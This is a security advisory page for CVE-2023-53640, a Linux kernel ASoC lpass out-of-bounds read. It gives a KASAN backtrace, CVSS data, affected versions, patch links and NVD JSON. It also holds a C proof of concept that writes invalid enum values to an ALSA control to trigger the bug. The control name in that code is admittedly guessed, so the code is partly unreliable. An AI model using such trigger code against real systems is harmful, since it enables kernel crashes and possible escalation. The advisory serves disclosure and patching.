Security Vulnerability Report
CVE-2023-53640 CVSS 7.8 HIGH

CVE-2023-53640

Published: 2025-10-07 16:15:47
Last Modified: 2026-02-03 22:30:01
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ASoC: lpass: Fix for KASAN use_after_free out of bounds

When we run syzkaller we get below Out of Bounds error.

"KASAN: slab-out-of-bounds Read in regcache_flat_read"

Below is the backtrace of the issue:

BUG: KASAN: slab-out-of-bounds in regcache_flat_read+0x10c/0x110
Read of size 4 at addr ffffff8088fbf714 by task syz-executor.4/14144
CPU: 6 PID: 14144 Comm: syz-executor.4 Tainted: G W
Hardware name: Qualcomm Technologies, Inc. sc7280 CRD platform (rev5+) (DT)
Call trace:
dump_backtrace+0x0/0x4ec
show_stack+0x34/0x50
dump_stack_lvl+0xdc/0x11c
print_address_description+0x30/0x2d8
kasan_report+0x178/0x1e4
__asan_report_load4_noabort+0x44/0x50
regcache_flat_read+0x10c/0x110
regcache_read+0xf8/0x5a0
_regmap_read+0x45c/0x86c
_regmap_update_bits+0x128/0x290
regmap_update_bits_base+0xc0/0x15c
snd_soc_component_update_bits+0xa8/0x22c
snd_soc_component_write_field+0x68/0xd4
tx_macro_put_dec_enum+0x1d0/0x268
snd_ctl_elem_write+0x288/0x474

By Error checking and checking valid values issue gets rectifies.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

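cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 5.12 up to, but excluding, 5.15.114) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 5.16 up to, but excluding, 6.1.31) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.2 up to, but excluding, 6.3.5) - VULNERABLE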
cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 75e5fab7db0cecb6e16b22c34608f0b40a4c7cd1
Linux Kernel < 8d81d3b0ed3610d24191d24f8e9e20f6775f0cc5
Linux Kernel < 8f1512d78b5de928f4616a871e77b58fd546e651
Linux Kernel < f5e61e3fe799ba2fda4320af23d26d28c3302045

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2023-53640 PoC - KASAN slab-out-of-bounds in regcache_flat_read
 * This PoC triggers the vulnerability through ALSA control interface
 * targeting the ASoC lpass tx_macro DAI enum control.
 *
 * Compile: gcc -o poc_cve_2023_53640 poc.c -lasound
 * Run: ./poc_cve_2023_53640
 *
 * Note: Requires a system with Qualcomm lpass audio hardware
 * (e.g., sc7280 CRD platform) and the vulnerable kernel version.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sound/asound.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
    int fd;
    const char *card_dev = "/dev/snd/controlC0";
    struct snd_ctl_elem_id id;
    struct snd_ctl_elem_value value;
    int ret;

    /* Open the ALSA control device */
    fd = open(card_dev, O_RDWR);
    if (fd < 0) {
        perror("Failed to open ALSA control device");
        return -1;
    }

    /* Construct a control element ID targeting the tx_macro DAI enum control
     * The exact control name depends on the codec driver, but typically
     * it relates to the TX macro digital interface configuration.
     */
    memset(&id, 0, sizeof(id));
    id.iface = SNDRV_CTL_ELEM_IFACE_MIXER;
    strncpy((char *)id.name, "TX Macro DEC Enum", sizeof(id.name) - 1);
    id.index = 0;

    /* Set the control value to trigger the out-of-bounds read
     * Using an out-of-range enum value to trigger invalid register access */
    memset(&value, 0, sizeof(value));
    value.id = id;

    /* Use an invalid enum value to trigger the vulnerability */
    value.value.enumerated.item[0] = 0xFFFF;

    /* Write the control value to trigger the vulnerability */
    ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &value);
    if (ret < 0) {
        fprintf(stderr, "ioctl SNDRV_CTL_IOCTL_ELEM_WRITE failed: %s\n", strerror(errno));
        /* Even if ioctl returns error, the kernel may have already
         * processed the invalid value and triggered the bug */
    }

    /* Try multiple invalid values to increase chances of triggering */
    for (int i = 0; i < 100; i++) {
        value.value.enumerated.item[0] = i * 1000;
        ioctl(fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &value);
    }

    close(fd);
    printf("PoC execution completed. Check kernel log for KASAN report.\n");
    return 0;
}

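References

https://git.kernel.org/stable/c/75e5fab7db0cecb6e16b22c34608f0b40a4c7cd1 (Patch)
https://git.kernel.org/stable/c/8d81d3b0ed3610d24191d24f8e9e20f6775f0cc5 (Patch)
https://git.kernel.org/stable/c/8f1512d78b5de928f4616a871e77b58fd546e651 (Patch)
https://git.kernel.org/stable/c/f5e61e3fe799ba2fda4320af23d26d28c3302045 (Patch)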

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53640", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:47.270", "lastModified": "2026-02-03T22:30:01.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: lpass: Fix for KASAN use_after_free out of bounds\n\nWhen we run syzkaller we get below Out of Bounds error.\n\n\"KASAN: slab-out-of-bounds Read in regcache_flat_read\"\n\nBelow is the backtrace of the issue:\n\nBUG: KASAN: slab-out-of-bounds in regcache_flat_read+0x10c/0x110\nRead of size 4 at addr ffffff8088fbf714 by task syz-executor.4/14144\nCPU: 6 PID: 14144 Comm: syz-executor.4 Tainted: G W\nHardware name: Qualcomm Technologies, Inc. sc7280 CRD platform (rev5+) (DT)\nCall trace:\ndump_backtrace+0x0/0x4ec\nshow_stack+0x34/0x50\ndump_stack_lvl+0xdc/0x11c\nprint_address_description+0x30/0x2d8\nkasan_report+0x178/0x1e4\n__asan_report_load4_noabort+0x44/0x50\nregcache_flat_read+0x10c/0x110\nregcache_read+0xf8/0x5a0\n_regmap_read+0x45c/0x86c\n_regmap_update_bits+0x128/0x290\nregmap_update_bits_base+0xc0/0x15c\nsnd_soc_component_update_bits+0xa8/0x22c\nsnd_soc_component_write_field+0x68/0xd4\ntx_macro_put_dec_enum+0x1d0/0x268\nsnd_ctl_elem_write+0x288/0x474\n\nBy Error checking and checking valid values issue gets rectifies."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], 
"configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.12", "versionEndExcluding": "5.15.114", "matchCriteriaId": "68F8E179-8339-4608-9B4A-2B6B83F723DE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.31", "matchCriteriaId": "79A1436B-7738-4A85-8FE6-B844059F22D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.5", "matchCriteriaId": "34DD94CA-4DA1-41C3-9A9B-92ACD7F4E240"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:*", "matchCriteriaId": "38BC6744-7D25-4C02-9966-B224CD071D30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:*", "matchCriteriaId": "76061B41-CAE9-4467-BEDE-0FFC7956F2A1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc3:*:*:*:*:*:*", "matchCriteriaId": "A717BA5B-D535-46A0-A329-A25FE5CEC588"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/75e5fab7db0cecb6e16b22c34608f0b40a4c7cd1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d81d3b0ed3610d24191d24f8e9e20f6775f0cc5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8f1512d78b5de928f4616a871e77b58fd546e651", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f5e61e3fe799ba2fda4320af23d26d28c3302045", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}